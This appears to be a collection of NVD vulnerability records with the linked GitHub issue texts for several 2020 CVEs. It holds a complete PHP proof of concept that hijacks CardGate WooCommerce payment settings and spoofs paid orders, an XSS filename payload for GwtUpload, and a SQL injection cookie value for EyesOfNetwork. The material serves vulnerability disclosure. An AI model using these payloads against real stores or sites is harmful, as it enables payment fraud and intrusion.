[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cardgate:cardgate_payments:*:*:*:*:*:woocommerce:*:*", "matchCriteriaId": "8C39B515-59B8-47BB-BE73-FDB32F1392E9", "versionEndExcluding": null, "versionEndIncluding": "3.1.15", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "346" ]
346
https://github.com/cardgate/woocommerce/issues/18
[ "Exploit", "Third Party Advisory" ]
github.com
[ "cardgate", "woocommerce" ]
### [CVE-2020-8819](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8819) Lack of origin authentication ([CWE-346](https://cwe.mitre.org/data/definitions/346.html)) at IPN callback processing function allow (**even _unauthorized_**) attacker to remotely replace critical plugin settings (merchant id, secret key etc) with known to him and therefore bypass payment process (eg. spoof order status by manually sending IPN callback request with a valid signature but without real payment) and/or receive all subsequent payments (on behalf of the store). ### Vulnerable code (fixed in PR #17) https://github.com/cardgate/woocommerce/blob/f2111af7b1a3fd701c1c5916137f3ac09482feeb/cardgate/cardgate.php#L426-L442 **Affected versions:** ≤ 3.1.15 **Tested on:** WordPress 5.3.2 + WooCommerce 3.9.1 + [CardGate Payment Gateway Plugin 3.1.15](https://github.com/cardgate/woocommerce/releases/tag/v3.1.15) <details><summary><strong>Proof-of-Concept</strong></summary> ```php /* Usage: 1. Change values of the constants (see below for TARGET & ORDER*) 2. Host this script somewhere (must be public accessible) 3. Register a merchant at https://cardgate.com 4. Sign into "My CardGate" dashboard 5. Add fake site or choose existing one 6. Click "Setup your Webshop" button in site preferences 7. Paste the URL of this script into the pop-up window and click "Save" 8. The target store now uses the settings of your site, enjoy :] P.S. It works perfectly in both Staging and Live modes, regardless of the current mode of the target shop. */ // -------- Options (start) -------- define('TARGET', 'http://domain.tld'); // without trailing slash, pls define('ORDER', 0); // provide non-zero value to automagically spoof order status // --------- Options (end) --------- define('API_STAGING', 'https://secure-staging.curopayments.net/rest/v1/curo/'); define('API_PRODUCTION', 'https://secure.curopayments.net/rest/v1/curo/'); /** * Original function from CardGate API client library (SDK) with minor changes * @param string $sToken_ * @param bool $bTestmode_ * @return string */ function pullConfig($sToken_, $bTestmode_ = FALSE) { if (!is_string($sToken_)) { throw new Exception('invalid token for settings pull: ' . $sToken_); } $sResource = "pullconfig/{$sToken_}/"; $sUrl = ($bTestmode_ ? API_STAGING : API_PRODUCTION) . $sResource; $rCh = curl_init(); curl_setopt($rCh, CURLOPT_URL, $sUrl); curl_setopt($rCh, CURLOPT_RETURNTRANSFER, 1); curl_setopt($rCh, CURLOPT_TIMEOUT, 60); curl_setopt($rCh, CURLOPT_HEADER, FALSE); curl_setopt($rCh, CURLOPT_HTTPHEADER, [ 'Content-Type: application/json', 'Accept: application/json' ]); if ($bTestmode_) { curl_setopt($rCh, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($rCh, CURLOPT_SSL_VERIFYHOST, 0); } else { curl_setopt($rCh, CURLOPT_SSL_VERIFYPEER, TRUE); curl_setopt($rCh, CURLOPT_SSL_VERIFYHOST, 2); } if (FALSE == ($sResults = curl_exec($rCh))) { $sError = curl_error($rCh); curl_close($rCh); throw new Exception('Client.Request.Curl.Error: ' . $sError); } else { curl_close($rCh); } if (NULL === ($aResults = json_decode($sResults, TRUE))) { throw new Exception('remote gave invalid JSON: ' . $sResults); } if (isset($aResults['error'])) { throw new Exception($aResults['error']['message']); } return $aResults; } /** * Original function from CardGate API client library (SDK) with minor changes * @param string $sUrl * @param array $aData_ * @param string $sHttpMethod_ * @return string */ function doRequest($sUrl, $aData_ = NULL, $sHttpMethod_ = 'POST') { if (!in_array($sHttpMethod_, ['GET', 'POST'])) { throw new Exception('invalid http method: ' . $sHttpMethod_); } $rCh = curl_init(); curl_setopt($rCh, CURLOPT_RETURNTRANSFER, 1); curl_setopt($rCh, CURLOPT_TIMEOUT, 60); curl_setopt($rCh, CURLOPT_HEADER, FALSE); curl_setopt($rCh, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($rCh, CURLOPT_SSL_VERIFYHOST, 0); if ('POST' == $sHttpMethod_) { curl_setopt($rCh, CURLOPT_URL, $sUrl); curl_setopt($rCh, CURLOPT_POST, TRUE); curl_setopt($rCh, CURLOPT_POSTFIELDS, http_build_query($aData_)); } else { $sUrl = $sUrl . (FALSE === strchr($sUrl, '?') ? '?' : '&') . http_build_query($aData_) ; curl_setopt($rCh, CURLOPT_URL, $sUrl); } $response = curl_exec($rCh); if (FALSE == $response) { $sError = curl_error($rCh); curl_close($rCh); throw new Exception('Client.Request.Curl.Error: ' . $sError); } else { curl_close($rCh); } return $response; } if (!empty($_REQUEST['cgp_sitesetup']) && !empty($_REQUEST['token'])) { try { $aResult = pullConfig($_REQUEST['token'], $_REQUEST['testmode']); $aConfigData = $aResult['pullconfig']['content']; $response = doRequest(TARGET, $_REQUEST); if ($response == $aConfigData['merchant'] . '.' . $aConfigData['site_id'] . '.200') { if (ORDER) { $payload = [ 'testmode' => $_REQUEST['testmode'], 'reference' => random_int(10000000000, 99999999999) . ORDER, 'transaction' => 'T' . str_pad(time(), 11, random_int(0, 9)), 'currency' => '', 'amount' => 0, 'status' => 'success', 'code' => 200 ]; $payload['hash'] = md5( (!empty($payload['testmode']) ? 'TEST' : '') . $payload['transaction'] . $payload['currency'] . $payload['amount'] . $payload['reference'] . $payload['code'] . $aConfigData['site_key'] ); $response = doRequest(TARGET . '/?cgp_notify=true', $payload); if ($response == $payload['transaction'] . '.' . $payload['code']) { die($aConfigData['merchant'] . '.' . $aConfigData['site_id'] . '.200'); } else { throw new Exception("Unable to spoof order status, but merchant settings was updated successfully ($response)"); } } else { die($aConfigData['merchant'] . '.' . $aConfigData['site_id'] . '.200'); } } else { throw new Exception("It seems target is not vulnerable ($response)"); } } catch (\Exception $oException_) { die(htmlspecialchars($oException_->getMessage())); } } ``` </p> </details>
Public disclosure on CVE-2020-8819 [Unauthorized Payments Hijacking + Order Status Spoofing]
https://api.github.com/repos/cardgate/woocommerce/issues/18/comments
1
2020-02-24T18:40:59Z
2020-03-04T07:18:28Z
https://github.com/cardgate/woocommerce/issues/18
570,050,115
18
1,092
CVE-2017-6363
2020-02-27T05:15:11.007
In the GD Graphics Library (aka LibGD) through 2.2.5, there is a heap-based buffer over-read in tiffWriter in gd_tiff.c. NOTE: the vendor says "In my opinion this issue should not have a CVE, since the GD and GD2 formats are documented to be 'obsolete, and should only be used for development and testing purposes.'
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/libgd/libgd/issues/383" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/libgd/libgd/issues/383" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libgd:libgd:*:*:*:*:*:*:*:*", "matchCriteriaId": "1C8F4811-034F-41ED-B690-188B0BE7D7DD", "versionEndExcluding": null, "versionEndIncluding": "2.2.5", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/libgd/libgd/issues/383
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "libgd", "libgd" ]
Description ======== Hi, when I fuzz the libgd, a invalid read occurs within the function tiffWriter of gd_tiff.c, it can be triggered by the [gdfile.txt](https://github.com/libgd/libgd/files/783796/gdfile.txt) Valgrind tracker ======== ``` ➜ Bin git:(master) ✗ valgrind --leak-check=yes ./test_gd2_bug00209 ../../ddms/Bin/gdfile.gd ==31702== Memcheck, a memory error detector ==31702== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al. ==31702== Using Valgrind-3.11.0 and LibVEX; rerun with -h for copyright info ==31702== Command: ./test_gd2_bug00209 ../../ddms/Bin/gdfile.gd ==31702== ==31702== Invalid read of size 4 ==31702== at 0x4E6F318: tiffWriter (gd_tiff.c:267) ==31702== by 0x4E6FD24: gdImageTiffCtx (gd_tiff.c:446) ==31702== by 0x4E712DF: gdImageTiffPtr (gd_tiff.c:1067) ==31702== by 0x40158F: main (bug00209.c:36) ==31702== Address 0x8177bdc is 249,468 bytes inside an unallocated block of size 4,104,832 in arena "client" ==31702== ==31702== Invalid read of size 4 ==31702== at 0x4E6F365: tiffWriter (gd_tiff.c:268) ==31702== by 0x4E6FD24: gdImageTiffCtx (gd_tiff.c:446) ==31702== by 0x4E712DF: gdImageTiffPtr (gd_tiff.c:1067) ==31702== by 0x40158F: main (bug00209.c:36) ==31702== Address 0x8177fdc is 250,492 bytes inside an unallocated block of size 4,104,832 in arena "client" ==31702== ==31702== Invalid read of size 4 ==31702== at 0x4E6F3AD: tiffWriter (gd_tiff.c:269) ==31702== by 0x4E6FD24: gdImageTiffCtx (gd_tiff.c:446) ==31702== by 0x4E712DF: gdImageTiffPtr (gd_tiff.c:1067) ==31702== by 0x40158F: main (bug00209.c:36) ==31702== Address 0x81783dc is 251,516 bytes inside an unallocated block of size 4,104,832 in arena "client" ==31702== ==31702== ==31702== HEAP SUMMARY: ==31702== in use at exit: 72,704 bytes in 1 blocks ```
Invalid read when call gdImageTiffPtr (CVE-2017-6363)
https://api.github.com/repos/libgd/libgd/issues/383/comments
7
2017-02-17T16:51:11Z
2018-02-04T15:49:30Z
https://github.com/libgd/libgd/issues/383
208,496,906
383
1,093
CVE-2020-7041
2020-02-27T18:15:11.483
An issue was discovered in openfortivpn 1.11.0 when used with OpenSSL 1.0.2 or later. tunnel.c mishandles certificate validation because an X509_check_host negative error code is interpreted as a successful return value.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00009.html" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00011.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/adrienverge/openfortivpn/commit/60660e00b80bad0fadcf39aee86f6f8756c94f91" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/adrienverge/openfortivpn/commit/cd9368c6a1b4ef91d77bb3fdbe2e5bc34aa6f4c4" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/adrienverge/openfortivpn/issues/536" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CKNKSGBVYGRRVRLFEFBEKUEJYJR5LWOF/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FF6HYIBREQGATRM5COF57MRQWKOKCWZ3/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SRVVNXCNTNMPCIAZIVR4FAGYCSU53FNA/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00009.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00011.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/adrienverge/openfortivpn/commit/60660e00b80bad0fadcf39aee86f6f8756c94f91" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/adrienverge/openfortivpn/commit/cd9368c6a1b4ef91d77bb3fdbe2e5bc34aa6f4c4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/adrienverge/openfortivpn/issues/536" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CKNKSGBVYGRRVRLFEFBEKUEJYJR5LWOF/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FF6HYIBREQGATRM5COF57MRQWKOKCWZ3/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SRVVNXCNTNMPCIAZIVR4FAGYCSU53FNA/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openfortivpn_project:openfortivpn:*:*:*:*:*:*:*:*", "matchCriteriaId": "9676ABA1-E073-4E5E-A583-9661F9220F98", "versionEndExcluding": "1.12.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "matchCriteriaId": "D105A942-579A-465F-A1D4-76DDF33440E6", "versionEndExcluding": null, "versionEndIncluding": "1.0.2", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*", "matchCriteriaId": "97A4B8DF-58DA-4AB6-A1F9-331B36409BA3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*", "matchCriteriaId": "80F0FA5D-8D3B-4C0E-81E2-87998286AF33", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*", "matchCriteriaId": "36D96259-24BD-44E2-96D9-78CE1D41F956", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:opensuse:backports_sle:15.0:sp1:*:*:*:*:*:*", "matchCriteriaId": "40513095-7E6E-46B3-B604-C926F1BA3568", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "295" ]
295
https://github.com/adrienverge/openfortivpn/issues/536
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "adrienverge", "openfortivpn" ]
Dear mantainers, As part of my work at GitHub's Security Lab, I have identified some security issues in openfortivpn and I would like to know the preferred way of communicating said issues. Best regards.
Security Contact
https://api.github.com/repos/adrienverge/openfortivpn/issues/536/comments
12
2020-01-14T13:12:17Z
2020-03-04T14:30:19Z
https://github.com/adrienverge/openfortivpn/issues/536
549,558,420
536
1,094
CVE-2020-9447
2020-02-28T16:15:11.087
There is an XSS (cross-site scripting) vulnerability in GwtUpload 1.0.3 in the file upload functionality. Someone can upload a file with a malicious filename, which contains JavaScript code, which would result in XSS. Cross-site scripting enables attackers to steal data, change the appearance of a website, and perform other malicious activities like phishing or drive-by hacking.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/manolo/gwtupload/issues/32" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://www.coresecurity.com/advisories/gwtupload-xss-file-upload-functionality" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/manolo/gwtupload/issues/32" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://www.coresecurity.com/advisories/gwtupload-xss-file-upload-functionality" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gwtupload_project:gwtupload:1.0.3:*:*:*:*:*:*:*", "matchCriteriaId": "83DF83B6-87E9-4C19-8616-59B0CE2A0364", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/manolo/gwtupload/issues/32
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "manolo", "gwtupload" ]
There is an XSS(Cross-site scripting) present in the file upload functionality, where someone can upload a file with malicious filename, which contains JavaScript code, which would results in XSS. Example: https://github.com/manolo/gwtupload/blob/master/samples/src/main/java/gwtuploadsample/client/SingleUploadSample.java ![image](https://user-images.githubusercontent.com/11824569/74173592-48169b80-4c2a-11ea-8868-fdfc497b5776.png) How to reproduce: 1. Deploy SingleUploadSample war file ( https://mvnrepository.com/artifact/com.googlecode.gwtupload/gwtupload-samples/1.0.3) 2. Upload a file from a Linux system(due to Windows filename character restrictions), which contains JavaScript code. For example: **a <img src=x onerror=alert("AppSec")>**
XSS in the file upload functionality
https://api.github.com/repos/manolo/gwtupload/issues/32/comments
9
2020-02-12T17:14:35Z
2022-06-15T08:05:15Z
https://github.com/manolo/gwtupload/issues/32
564,144,989
32
1,095
CVE-2020-9465
2020-02-28T20:15:11.787
An issue was discovered in EyesOfNetwork eonweb 5.1 through 5.3 before 5.3-3. The eonweb web interface is prone to a SQL injection, allowing an unauthenticated attacker to perform various tasks such as authentication bypass via the user_id field in a cookie.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/EyesOfNetworkCommunity/eonweb/issues/51" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/EyesOfNetworkCommunity/eonweb/releases/tag/5.3-3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/EyesOfNetworkCommunity/eonweb/issues/51" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/EyesOfNetworkCommunity/eonweb/releases/tag/5.3-3" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:eyesofnetwork:eyesofnetwork:*:*:*:*:*:*:*:*", "matchCriteriaId": "33CD9C65-C80F-4334-976A-184CAC52CA0E", "versionEndExcluding": "5.3-3", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "5.1", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/EyesOfNetworkCommunity/eonweb/issues/51
[ "Exploit", "Third Party Advisory" ]
github.com
[ "EyesOfNetworkCommunity", "eonweb" ]
Bonjour, Il est possible de réaliser une injection SQL sur le cookie `user_id`. Il a été observé que cette injection est possible sur les pages `index.php`, `login.php` et `logout.php` sans authentification préalable. Exemple d'injection de code utilisant la fonction sleep(3): `Cookie: user_id=1' union select sleep(3) -- ;` L'exploitation d'une telle injection SQL peut permettre à un attaquant d'obtenir des accès administrateurs sur l'application (récupération de session_id admin, dump de table users). Ceci a été testé sur une installation de EON **5.1** et **5.3** téléchargée à partir du site officiel (la 5.2 doit probablement aussi être vulnérable). Le fichier source permettant l’injection SQL est `eonweb/include/classes/Translator.class.php` au morceau de code suivant : ```php // Check if user default lang is defined if(isset($_COOKIE['user_id'])){ $lang = mysqli_result(sqlrequest($database_eonweb,"select user_language from users where user_id='".$_COOKIE['user_id']."'"),0); } ```
Injection SQL sur le cookie user_id
https://api.github.com/repos/EyesOfNetworkCommunity/eonweb/issues/51/comments
1
2020-02-26T17:32:06Z
2020-02-28T12:40:58Z
https://github.com/EyesOfNetworkCommunity/eonweb/issues/51
571,545,509
51
1,096
CVE-2020-9546
2020-03-02T04:15:10.843
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig (aka shaded hikari-config).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/FasterXML/jackson-databind/issues/2631" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r35d30db00440ef63b791c4b7f7acb036e14d4a23afa2a249cb66c0fd%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r893a0104e50c1c2559eb9a5812add28ae8c3e5f43712947a9847ec18%40%3Cnotifications.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r9464a40d25c3ba1a55622db72f113eb494a889656962d098c70c5bb1%40%3Cdev.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r98c9b6e4c9e17792e2cd1ec3e4aa20b61a791939046d3f10888176bb%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/rb6fecb5e96a6d61e175ff49f33f2713798dd05cf03067c169d195596%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/rd5a4457be4623038c3989294429bc063eec433a2e55995d81591e2ca%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/rdd49ab9565bec436a896bc00c4b9fc9dce1598e106c318524fbdfec6%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/rdd4df698d5d8e635144d2994922bf0842e933809eae259521f3b5097%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2%40%3Cissues.geode.apache.org%3E" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/03/msg00008.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://medium.com/%40cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200904-0006/" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/FasterXML/jackson-databind/issues/2631" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": 